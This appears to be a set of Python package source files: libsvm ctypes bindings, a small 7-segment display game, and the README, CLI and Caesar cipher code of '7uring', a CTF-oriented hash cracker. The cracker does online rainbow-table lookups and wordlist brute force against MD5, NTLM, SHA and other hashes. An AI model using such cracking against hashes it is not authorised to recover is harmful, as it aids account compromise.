self.nr_fold = int(argv[i])
if self.nr_fold < 2:
raise ValueError("n-fold cross validation: n must >= 2")
elif argv[i].startswith("-w"):
i = i + 1
self.nr_weight += 1
nr_weight = self.nr_weight
weight_label += [int(argv[i-1][2:])]
weight += [float(argv[i])]
else:
raise ValueError("Wrong options")
i += 1
libsvm.svm_set_print_string_function(self.print_func)
self.weight_label = (c_int*self.nr_weight)()
self.weight = (c_double*self.nr_weight)()
for i in range(self.nr_weight):
self.weight[i] = weight[i]
self.weight_label[i] = weight_label[i]
class svm_model(Structure):
_names = ['param', 'nr_class', 'l', 'SV', 'sv_coef', 'rho',
'probA', 'probB', 'sv_indices', 'label', 'nSV', 'free_sv']
_types = [svm_parameter, c_int, c_int, POINTER(POINTER(svm_node)),
POINTER(POINTER(c_double)), POINTER(c_double),
POINTER(c_double), POINTER(c_double), POINTER(c_int),
POINTER(c_int), POINTER(c_int), c_int]
_fields_ = genFields(_names, _types)
def __init__(self):
self.__createfrom__ = 'python'
def __del__(self):
# free memory created by C to avoid memory leak
if hasattr(self, '__createfrom__') and self.__createfrom__ == 'C':
libsvm.svm_free_and_destroy_model(pointer(self))
def get_svm_type(self):
return libsvm.svm_get_svm_type(self)
def get_nr_class(self):
return libsvm.svm_get_nr_class(self)
def get_svr_probability(self):
return libsvm.svm_get_svr_probability(self)
def get_labels(self):
nr_class = self.get_nr_class()
labels = (c_int * nr_class)()
libsvm.svm_get_labels(self, labels)
return labels[:nr_class]
def get_sv_indices(self):
total_sv = self.get_nr_sv()
sv_indices = (c_int * total_sv)()
libsvm.svm_get_sv_indices(self, sv_indices)
return sv_indices[:total_sv]
def get_nr_sv(self):
return libsvm.svm_get_nr_sv(self)
def is_probability_model(self):
return (libsvm.svm_check_probability_model(self) == 1)
def get_sv_coef(self):
return [tuple(self.sv_coef[j][i] for j in xrange(self.nr_class - 1))
for i in xrange(self.l)]
def get_SV(self):
result = []
for sparse_sv in self.SV[:self.l]:
row = dict()
i = 0
while True:
row[sparse_sv[i].index] = sparse_sv[i].value
if sparse_sv[i].index == -1:
break
i += 1
result.append(row)
return result
def toPyModel(model_ptr):
"""
toPyModel(model_ptr) -> svm_model
Convert a ctypes POINTER(svm_model) to a Python svm_model
"""
if bool(model_ptr) == False:
raise ValueError("Null pointer")
m = model_ptr.contents
m.__createfrom__ = 'C'
return m
fillprototype(libsvm.svm_train, POINTER(svm_model), [POINTER(svm_problem), POINTER(svm_parameter)])
fillprototype(libsvm.svm_cross_validation, None, [POINTER(svm_problem), POINTER(svm_parameter), c_int, POINTER(c_double)])
fillprototype(libsvm.svm_save_model, c_int, [c_char_p, POINTER(svm_model)])
fillprototype(libsvm.svm_load_model, POINTER(svm_model), [c_char_p])
fillprototype(libsvm.svm_get_svm_type, c_int, [POINTER(svm_model)])
fillprototype(libsvm.svm_get_nr_class, c_int, [POINTER(svm_model)])
fillprototype(libsvm.svm_get_labels, None, [POINTER(svm_model), POINTER(c_int)])
fillprototype(libsvm.svm_get_sv_indices, None, [POINTER(svm_model), POINTER(c_int)])
fillprototype(libsvm.svm_get_nr_sv, c_int, [POINTER(svm_model)])
fillprototype(libsvm.svm_get_svr_probability, c_double, [POINTER(svm_model)])
fillprototype(libsvm.svm_predict_values, c_double, [POINTER(svm_model), POINTER(svm_node), POINTER(c_double)])
fillprototype(libsvm.svm_predict, c_double, [POINTER(svm_model), POINTER(svm_node)])
fillprototype(libsvm.svm_predict_probability, c_double, [POINTER(svm_model), POINTER(svm_node), POINTER(c_double)])
fillprototype(libsvm.svm_free_model_content, None, [POINTER(svm_model)])
fillprototype(libsvm.svm_free_and_destroy_model, None, [POINTER(POINTER(svm_model))])
fillprototype(libsvm.svm_destroy_param, None, [POINTER(svm_parameter)])
fillprototype(libsvm.svm_check_parameter, c_char_p, [POINTER(svm_problem), POINTER(svm_parameter)])
fillprototype(libsvm.svm_check_probability_model, c_int, [POINTER(svm_model)])
fillprototype(libsvm.svm_set_print_string_function, None, [PRINT_STRING_FUN]) | 7lk_ocr_deploy | /7lk_ocr_deploy-0.1.69.tar.gz/7lk_ocr_deploy-0.1.69/libsvm/svm.py | svm.py |
import os
import sys
from svm import *
from svm import __all__ as svm_all
__all__ = ['evaluations', 'svm_load_model', 'svm_predict', 'svm_read_problem',
'svm_save_model', 'svm_train'] + svm_all
sys.path = [os.path.dirname(os.path.abspath(__file__))] + sys.path
def svm_read_problem(data_file_name):
"""
svm_read_problem(data_file_name) -> [y, x]
Read LIBSVM-format data from data_file_name and return labels y
and data instances x.
"""
prob_y = []
prob_x = []
for line in open(data_file_name):
line = line.split(None, 1)
# In case an instance with all zero features
if len(line) == 1: line += ['']
label, features = line
xi = {}
for e in features.split():
ind, val = e.split(":")
xi[int(ind)] = float(val)
prob_y += [float(label)]
prob_x += [xi]
return (prob_y, prob_x)
def svm_load_model(model_file_name):
"""
svm_load_model(model_file_name) -> model
Load a LIBSVM model from model_file_name and return.
"""
model = libsvm.svm_load_model(model_file_name.encode())
if not model:
print("can't open model file %s" % model_file_name)
return None
model = toPyModel(model)
return model
def svm_save_model(model_file_name, model):
"""
svm_save_model(model_file_name, model) -> None
Save a LIBSVM model to the file model_file_name.
"""
libsvm.svm_save_model(model_file_name.encode(), model)
def evaluations(ty, pv):
"""
evaluations(ty, pv) -> (ACC, MSE, SCC)
Calculate accuracy, mean squared error and squared correlation coefficient
using the true values (ty) and predicted values (pv).
"""
if len(ty) != len(pv):
raise ValueError("len(ty) must equal to len(pv)")
total_correct = total_error = 0
sumv = sumy = sumvv = sumyy = sumvy = 0
for v, y in zip(pv, ty):
if y == v:
total_correct += 1
total_error += (v-y)*(v-y)
sumv += v
sumy += y
sumvv += v*v
sumyy += y*y
sumvy += v*y
l = len(ty)
ACC = 100.0*total_correct/l
MSE = total_error/l
try:
SCC = ((l*sumvy-sumv*sumy)*(l*sumvy-sumv*sumy))/((l*sumvv-sumv*sumv)*(l*sumyy-sumy*sumy))
except:
SCC = float('nan')
return (ACC, MSE, SCC)
def svm_train(arg1, arg2=None, arg3=None):
"""
svm_train(y, x [, options]) -> model | ACC | MSE
svm_train(prob [, options]) -> model | ACC | MSE
svm_train(prob, param) -> model | ACC| MSE
Train an SVM model from data (y, x) or an svm_problem prob using
'options' or an svm_parameter param.
If '-v' is specified in 'options' (i.e., cross validation)
either accuracy (ACC) or mean-squared error (MSE) is returned.
options:
-s svm_type : set type of SVM (default 0)
0 -- C-SVC (multi-class classification)
1 -- nu-SVC (multi-class classification)
2 -- one-class SVM
3 -- epsilon-SVR (regression)
4 -- nu-SVR (regression)
-t kernel_type : set type of kernel function (default 2)
0 -- linear: u'*v
1 -- polynomial: (gamma*u'*v + coef0)^degree
2 -- radial basis function: exp(-gamma*|u-v|^2)
3 -- sigmoid: tanh(gamma*u'*v + coef0)
4 -- precomputed kernel (kernel values in training_set_file)
-d degree : set degree in kernel function (default 3)
-g gamma : set gamma in kernel function (default 1/num_features)
-r coef0 : set coef0 in kernel function (default 0)
-c cost : set the parameter C of C-SVC, epsilon-SVR, and nu-SVR (default 1)
-n nu : set the parameter nu of nu-SVC, one-class SVM, and nu-SVR (default 0.5)
-p epsilon : set the epsilon in loss function of epsilon-SVR (default 0.1)
-m cachesize : set cache memory size in MB (default 100)
-e epsilon : set tolerance of termination criterion (default 0.001)
-h shrinking : whether to use the shrinking heuristics, 0 or 1 (default 1)
-b probability_estimates : whether to train a SVC or SVR model for probability estimates, 0 or 1 (default 0)
-wi weight : set the parameter C of class i to weight*C, for C-SVC (default 1)
-v n: n-fold cross validation mode
-q : quiet mode (no outputs)
"""
prob, param = None, None
if isinstance(arg1, (list, tuple)):
assert isinstance(arg2, (list, tuple))
y, x, options = arg1, arg2, arg3
param = svm_parameter(options)
prob = svm_problem(y, x, isKernel=(param.kernel_type == PRECOMPUTED))
elif isinstance(arg1, svm_problem):
prob = arg1
if isinstance(arg2, svm_parameter):
param = arg2
else:
param = svm_parameter(arg2)
if prob == None or param == None:
raise TypeError("Wrong types for the arguments")
if param.kernel_type == PRECOMPUTED:
for xi in prob.x_space:
idx, val = xi[0].index, xi[0].value
if xi[0].index != 0:
raise ValueError('Wrong input format: first column must be 0:sample_serial_number')
if val <= 0 or val > prob.n:
raise ValueError('Wrong input format: sample_serial_number out of range')
if param.gamma == 0 and prob.n > 0:
param.gamma = 1.0 / prob.n
libsvm.svm_set_print_string_function(param.print_func)
err_msg = libsvm.svm_check_parameter(prob, param)
if err_msg:
raise ValueError('Error: %s' % err_msg)
if param.cross_validation:
l, nr_fold = prob.l, param.nr_fold
target = (c_double * l)()
libsvm.svm_cross_validation(prob, param, nr_fold, target)
ACC, MSE, SCC = evaluations(prob.y[:l], target[:l])
if param.svm_type in [EPSILON_SVR, NU_SVR]:
print("Cross Validation Mean squared error = %g" % MSE)
print("Cross Validation Squared correlation coefficient = %g" % SCC)
return MSE
else:
print("Cross Validation Accuracy = %g%%" % ACC)
return ACC
else:
m = libsvm.svm_train(prob, param)
m = toPyModel(m)
# If prob is destroyed, data including SVs pointed by m can remain.
m.x_space = prob.x_space
return m
def svm_predict(y, x, m, options=""):
"""
svm_predict(y, x, m [, options]) -> (p_labels, p_acc, p_vals)
Predict data (y, x) with the SVM model m.
options:
-b probability_estimates: whether to predict probability estimates,
0 or 1 (default 0); for one-class SVM only 0 is supported.
-q : quiet mode (no outputs).
The return tuple contains
p_labels: a list of predicted labels
p_acc: a tuple including accuracy (for classification), mean-squared
error, and squared correlation coefficient (for regression).
p_vals: a list of decision values or probability estimates (if '-b 1'
is specified). If k is the number of classes, for decision values,
each element includes results of predicting k(k-1)/2 binary-class
SVMs. For probabilities, each element contains k values indicating
the probability that the testing instance is in each class.
Note that the order of classes here is the same as 'model.label'
field in the model structure.
"""
def info(s):
print(s)
predict_probability = 0
argv = options.split()
i = 0
while i < len(argv):
if argv[i] == '-b':
i += 1
predict_probability = int(argv[i])
elif argv[i] == '-q':
info = print_null
else:
raise ValueError("Wrong options")
i+=1
svm_type = m.get_svm_type()
is_prob_model = m.is_probability_model()
nr_class = m.get_nr_class()
pred_labels = []
pred_values = []
if predict_probability:
if not is_prob_model:
raise ValueError("Model does not support probabiliy estimates")
if svm_type in [NU_SVR, EPSILON_SVR]:
info("Prob. model for test data: target value = predicted value + z,\n"
"z: Laplace distribution e^(-|z|/sigma)/(2sigma),sigma=%g" % m.get_svr_probability());
nr_class = 0
prob_estimates = (c_double * nr_class)()
for xi in x:
xi, idx = gen_svm_nodearray(xi, isKernel=(m.param.kernel_type == PRECOMPUTED))
label = libsvm.svm_predict_probability(m, xi, prob_estimates)
values = prob_estimates[:nr_class]
pred_labels += [label]
pred_values += [values]
else:
if is_prob_model:
info("Model supports probability estimates, but disabled in predicton.")
if svm_type in (ONE_CLASS, EPSILON_SVR, NU_SVC):
nr_classifier = 1
else:
nr_classifier = nr_class*(nr_class-1)//2
dec_values = (c_double * nr_classifier)()
for xi in x:
xi, idx = gen_svm_nodearray(xi, isKernel=(m.param.kernel_type == PRECOMPUTED))
label = libsvm.svm_predict_values(m, xi, dec_values)
if(nr_class == 1):
values = [1]
else:
values = dec_values[:nr_classifier]
pred_labels += [label]
pred_values += [values]
ACC, MSE, SCC = evaluations(y, pred_labels)
l = len(y)
if svm_type in [EPSILON_SVR, NU_SVR]:
info("Mean squared error = %g (regression)" % MSE)
info("Squared correlation coefficient = %g (regression)" % SCC)
else:
info("Accuracy = %g%% (%d/%d) (classification)" % (ACC, int(l*ACC/100), l))
return pred_labels, (ACC, MSE, SCC), pred_values | 7lk_ocr_deploy | /7lk_ocr_deploy-0.1.69.tar.gz/7lk_ocr_deploy-0.1.69/libsvm/svmutil.py | svmutil.py |
from ZeroSeg import Button, screen
from time import sleep
from random import randrange
from threading import Thread
import sys
right_button = Button("right")
left_button = Button("left")
def generate_hurdle() -> int:
"""
Generate random number (0 or 1) and because of it create obstacle
on the top of the map or on the bottom.
"""
rand = randrange(2)
if rand == 1:
return 35 # Top hurdle (stalactite).
else:
return 29 # Bottom hurdle.
class ctx(object):
"""
Game context.
"""
if len(sys.argv) > 1:
difficulty = float(sys.argv[1])
else:
difficulty = 0.3 # More == easier.
hero_up = 64
hero_down = 8
hero_position = hero_down
hero_index = 6
hurdles = [generate_hurdle(), generate_hurdle()]
points = 0
game = True
def game_over():
"""
Display game over screen.
"""
ctx.game = False
screen.write_blinking_text(" LOSE ", stop_after=2)
screen.write_text(f"P {ctx.points}")
def draw_hurdles(hurdles_byte: int, position: int):
"""
Simple wrapper function to draw hurdles.
"""
screen.set_byte(hurdles_byte, position)
def draw_hero(position: int, hurdle: int = False) -> bool:
"""
Draw a hero on the screen on specified position. If hero is in a clash
with hurdle, draw hero under or over it.
"""
if hurdle: # Draw hero over or under obstacle.
if position == ctx.hero_down and hurdle == 35:
screen.set_byte(43, ctx.hero_index) # 43 - hero under obstacle.
elif position == ctx.hero_up and hurdle == 29:
screen.set_byte(93, ctx.hero_index) # 93 - hero over obstacle.
else:
game_over()
return False
else:
screen.set_byte(position, ctx.hero_index)
return True
def handle_movements():
"""
Handle button presses in other thread.
"""
while ctx.game:
if right_button.pressed():
ctx.hero_position = ctx.hero_up
elif left_button.pressed():
ctx.hero_position = ctx.hero_down
def main():
screen.write_blinking_text(' ' + '.'*5, stop_after=2)
Thread(target=handle_movements, daemon=True).start()
i = 1
while True:
screen.clear()
if i > 8:
i = 1
del ctx.hurdles[0]
ctx.hurdles.append(generate_hurdle())
ctx.points += 1
if i != ctx.hero_index:
draw_hurdles(ctx.hurdles[0], i)
draw_hero(ctx.hero_position) # Restore hero on previous position.
if i >= 4:
draw_hurdles(ctx.hurdles[1], i - 3)
if i == ctx.hero_index:
if not (draw_hero(ctx.hero_position, ctx.hurdles[0])):
break
if ctx.points > 0:
if i < 4:
if (ctx.hero_index - 1) + i == ctx.hero_index:
if not (draw_hero(ctx.hero_position, ctx.hurdles[0])):
break
else:
draw_hurdles(ctx.hurdles[0], (ctx.hero_index - 1) + i)
i += 1
sleep(ctx.difficulty)
if __name__ == "__main__":
main() | 7seg-ByteBird | /7seg_ByteBird-0.2-py3-none-any.whl/ByteBird/game.py | game.py |
<h1 align="center">
<br>
<a href="https://github.com/karthikuj/7uring"><img src="https://raw.githubusercontent.com/karthikuj/karthikuj/master/images/7uring.png" alt="7uring" title="7uring"></a>
<br>
7uring: Not your ordinary hashcracker.
<br>
</h1>
## [-] About 7uring:
7uring is an advanced cryptography tool which works with some of the most popular hashes, encodings and ciphers. 7uring's advanced hash functions can check online rainbow tables before you try to bruteforce the hashes, because of which your hashes are cracked in a matter of seconds.
In the future, we plan to incorporate steganography, cryptanalysis and much more.
In short 7uring can take your CTF rank up a notch.
## [-] Installing 7uring:
You can install `7uring` like this:
1. Clone the repository:
```
git clone https://github.com/karthikuj/7uring.git
```
2. Change the directory:
```
cd 7uring/
```
3. Install required modules:
```
python -m pip install -r requirements.txt
```
4. Install the package:
```
pip install .
```
## [-] Using 7uring:
### Syntax:
```
7uring [subcommand] [format] [option] [suboption] data
```
### Subcommands:
```
hash
```
```
cipher
```
```
encoder
```
### Formats:
#### Hash:
```
--blake2b
```
```
--md4
```
```
--md5
```
```
--ntlm
```
```
--sha1
```
```
--sha224
```
```
--sha256
```
```
--sha384
```
```
--sha512
```
```
--whirlpool
```
#### Ciphers:
```
--bacon
```
```
--caesar
```
```
--monoalphabetic
```
```
--morse
```
```
--multitapsms
```
```
--rot13
```
```
--rot47
```
```
--transposition
```
#### Encodings:
```
--binary
```
```
--octal
```
```
--hexadecimal
```
```
--base64
```
#### Options:
To encrypt:
```
--enc
```
To decrypt:
```
--dec
```
To check online rainbow tables (for hashes only!):
```
--rainbow
```
To bruteforce:
```
--brute
```
#### Suboptions:
The only suboption is ```-w``` to specify wordlist while using ```--brute```
## [-] Examples:
```
7uring --help
```
```
7uring hash --md5 --enc spongebob
```
```
7uring hash --md5 --rainbow e1964798cfe86e914af895f8d0291812
```
```
7uring cipher --caesar --enc spongebob
```
```
7uring hash --md5 --brute -w /usr/share/wordlists/rockyou.txt e1964798cfe86e914af895f8d0291812
```
## [-] Uninstalling 7uring:
#### Sorry to see you go :(
```
pip uninstall 7uring
```
#### Made with ❤️ by <a href="https://www.instagram.com/5up3r541y4n/" target="_blank">@5up3r541y4n</a>
| 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/README.md | README.md |
from turing.programfiles.menu import *
from turing.programfiles.banner import *
import sys
from turing.hashing.hashmd5 import *
from turing.hashing.hashsha512 import *
from turing.hashing.hashsha1 import *
from turing.hashing.hashsha256 import *
from turing.hashing.hashsha224 import *
from turing.hashing.hashsha384 import *
from turing.hashing.hashmd4 import *
from turing.hashing.hashblake2b import *
from turing.hashing.hashwhirlpool import *
from turing.hashing.hashntlm import *
from turing.cipher.caesar import *
from turing.cipher.morse import *
from turing.cipher.rot13 import *
from turing.cipher.transposition import *
from turing.cipher.multitapSMS import *
from turing.cipher.bacon import *
from turing.cipher.monoalphabetic import *
from turing.cipher.rot47 import *
from turing.encoder.binary import *
from turing.encoder.octal import *
from turing.encoder.hexadecimal import *
from turing.encoder.base64 import *
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'header':'\033[94;1m',
'msg':'\033[33;1m[o] '
}
def cliPro(argv):
printBanner()
if 'hash' in argv and '--brute' in argv and '-w' not in argv:
print('\n' + colors['error'] + 'Wordlist (-w) not specified')
sys.exit()
if 'hash' in argv and '--brute' in argv and '-w' in argv and len(argv) < 7:
print('\n' + colors['error'] + 'All arguments not specified! \
7uring --help for help menu.\n')
sys.exit()
if '--brute' in argv and '-w' in argv and len(argv) >= 7:
wordlist = argv[5]
data = ' '.join(argv[6:])
elif len(argv) >= 5:
data = ' '.join(argv[4:])
if len(argv) < 2:
print('\n' + colors['error'] + 'No arguments specified! \
7uring --help for help menu.\n')
sys.exit()
elif '--help' in argv or '-h' in argv:
printMenu()
elif len(argv) < 5:
print('\n' + colors['error'] + 'All arguments not specified! \
7uring --help for help menu.\n')
sys.exit()
elif argv[1].lower() not in subcommand:
print(colors['error'] + 'Unrecognized subcommand.')
sys.exit()
elif argv[1].lower() == 'hash':
if argv[2].lower() not in hashes:
print(colors['error'] + 'Unrecognized hash type.')
sys.exit()
elif argv[3].lower() not in options:
print(colors['error'] + 'Unrecognized option ' + '\'' + argv[3] + '\'')
sys.exit()
elif argv[2].lower() == '--md5':
if argv[3] == '--enc':
print(colors['success'] + stringToMD5(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
md5ToString(data)
else:
md5Brute(data, wordlist)
elif argv[2].lower() == '--blake2b':
if argv[3] == '--enc':
print(colors['success'] + stringToBlake2b(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
blake2bToString(data)
else:
blake2bBrute(data, wordlist)
elif argv[2].lower() == '--md4':
if argv[3] == '--enc':
print(colors['success'] + stringToMD4(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
md4ToString(data)
else:
md4Brute(data, wordlist)
elif argv[2].lower() == '--ntlm':
if argv[3] == '--enc':
print(colors['success'] + stringToNTLM(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
ntlmToString(data)
else:
ntlmBrute(data, wordlist)
elif argv[2].lower() == '--sha1':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA1(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha1ToString(data)
else:
sha1Brute(data, wordlist)
elif argv[2].lower() == '--sha224':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA224(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha224ToString(data)
else:
sha224Brute(data, wordlist)
elif argv[2].lower() == '--sha256':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA256(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha256ToString(data)
else:
sha256Brute(data, wordlist)
elif argv[2].lower() == '--sha384':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA384(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha384ToString(data)
else:
sha384Brute(data, wordlist)
elif argv[2].lower() == '--sha512':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA512(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha512ToString(data)
else:
sha512Brute(data, wordlist)
elif argv[2].lower() == '--whirlpool':
if argv[3] == '--enc':
print(colors['success'] + stringToWhirlpool(data))
elif argv[3] == '--dec':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for hashes. Use --rainbow or --brute\
instead.')
sys.exit()
elif argv[3] == '--rainbow':
whirlpoolToString(data)
else:
whirlpoolBrute(data, wordlist)
elif argv[1].lower() == 'cipher':
if argv[2].lower() not in ciphers:
print(colors['error'] + 'Unrecognized cipher type.')
sys.exit()
elif argv[3].lower() not in options:
print(colors['error'] + 'Unrecognized option ' + '\'' + argv[3] + '\'')
sys.exit()
elif argv[2].lower() == '--bacon':
if argv[3] == '--enc':
baconEncrypt(data)
elif argv[3] == '--dec':
baconDecrypt(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers(except caesar). Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--caesar':
if argv[3] == '--enc':
shift = int(input(colors['msg'] + 'Enter shift value: '))
caesarEncrypt(data, shift)
elif argv[3] == '--dec':
shift = int(input(colors['msg'] + 'Enter shift value: '))
caesarDecrypt(data, shift)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers. Use --enc or --dec\
instead.')
sys.exit()
else:
caesarBrute(data)
sys.exit()
elif argv[2].lower() == '--monoalphabetic':
if argv[3] == '--enc':
monoalphabeticEncrypt(data)
elif argv[3] == '--dec':
monoalphabeticDecrypt(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers(except caesar). Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--morse':
if argv[3] == '--enc':
morseEncrypt(data)
elif argv[3] == '--dec':
morseDecrypt(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers(except caesar). Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--multitapsms':
if argv[3] == '--enc':
multitapEncrypt(data)
elif argv[3] == '--dec':
multitapDecrypt(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers(except caesar). Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--rot13':
if argv[3] == '--enc':
rot13Encrypt(data)
elif argv[3] == '--dec':
rot13Decrypt(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers(except caesar). Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--rot47':
if argv[3] == '--enc':
rot47Encrypt(data)
elif argv[3] == '--dec':
rot47Decrypt(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers(except caesar). Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--transposition':
if argv[3] == '--enc':
key = input(colors['msg'] + 'Enter key value: ')
transpositionEncrypt(data, key)
elif argv[3] == '--dec':
key = input(colors['msg'] + 'Enter key value: ')
transpositionDecrypt(data, key)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for ciphers(except caesar). Use --enc or --dec\
instead.')
sys.exit()
elif argv[1].lower() == 'encoder':
if argv[2].lower() not in encoders:
print(colors['error'] + 'Unrecognized encoding type.')
sys.exit()
elif argv[3].lower() not in options:
print(colors['error'] + 'Unrecognized option ' + '\'' + argv[3] + '\'')
sys.exit()
elif argv[2].lower() == '--binary':
if argv[3] == '--enc':
binaryEncode(data)
elif argv[3] == '--dec':
binaryDecode(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for encoders. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for encoders. Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--octal':
if argv[3] == '--enc':
octalEncode(data)
elif argv[3] == '--dec':
octalDecode(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for encoders. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for encoders. Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--hexadecimal':
if argv[3] == '--enc':
hexadecimalEncode(data)
elif argv[3] == '--dec':
hexadecimalDecode(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for encoders. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for encoders. Use --enc or --dec\
instead.')
sys.exit()
elif argv[2].lower() == '--base64':
if argv[3] == '--enc':
base64Encode(data)
elif argv[3] == '--dec':
base64Decode(data)
elif argv[3] == '--rainbow':
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for encoders. Use --enc or --dec\
instead.')
sys.exit()
else:
print(colors['error'] + '\'' + argv[3] + '\'' +
', this option is not for encoders. Use --enc or --dec\
instead.')
sys.exit() | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/programfiles/cliProcess.py | cliProcess.py |
import sys, enchant
small = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'msg':'\033[33;1m[o] '
}
def caesarEncrypt(text, shift):
res = ''
if shift < 0 or shift > 25:
print(colors['error'] + 'Shift value should be 0-25') #Shift value check
for i in range(len(text)):
if text[i].isupper():
ind = small.index(text[i].lower()) #Find the index of character
res += small[(ind + shift)%26].upper() #Shift the character
elif text[i].islower():
ind = small.index(text[i]) #Find the index of character
res += small[(ind + shift)%26] #Shift the character
elif text[i] == ' ':
res += ' '
else:
print(colors['error'] + 'Invalid characters!') #Check for invalid characters
sys.exit()
print(colors['success'] + res)
def caesarDecrypt(text, shift):
res = ''
if shift < 0 or shift > 25:
print(colors['error'] + 'Shift value should be 0-25') #Shift value check
for i in range(len(text)):
if text[i].isupper():
ind = small.index(text[i].lower()) #Find the index of character
res += small[ind - shift].upper() #Shift the character
elif text[i].islower():
ind = small.index(text[i]) #Find the index of character
res += small[ind - shift] #Shift the character
elif text[i] == ' ':
res += ' '
else:
print(colors['error'] + 'Invalid characters!') #Check for invalid characters
sys.exit()
print(colors['success'] + res)
def caesarBrute(text):
possible = set()
for shift in range(26):
res = ''
for i in range(len(text)):
if text[i].isupper():
ind = small.index(text[i].lower()) #Find the index of character
res += small[ind - shift].upper() #Shift the character
elif text[i].islower():
ind = small.index(text[i]) #Find the index of character
res += small[ind - shift] #Shift the character
elif text[i] == ' ':
res += ' '
else:
print(colors['error'] + 'Invalid characters!') #Check for invalid characters
sys.exit()
print(colors['success'] + 'shift(' + "{:02d}".format(shift) +
')' + ' : ' + res)
dic = enchant.Dict('en_US') #Create a US english Dictionary
for j in res.split():
if len(j) > 2 and dic.check(j): #Check for english words
possible.add('shift(' + "{:02d}".format(shift) +
')' + ' : ' + res)
if len(possible) > 0:
print(colors['success'][:-4] + '\nMost possible solutions:') #Print most possible solutions
for k in possible:
print(colors['success'] + k) | 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/turing/cipher/caesar.py | caesar.py |
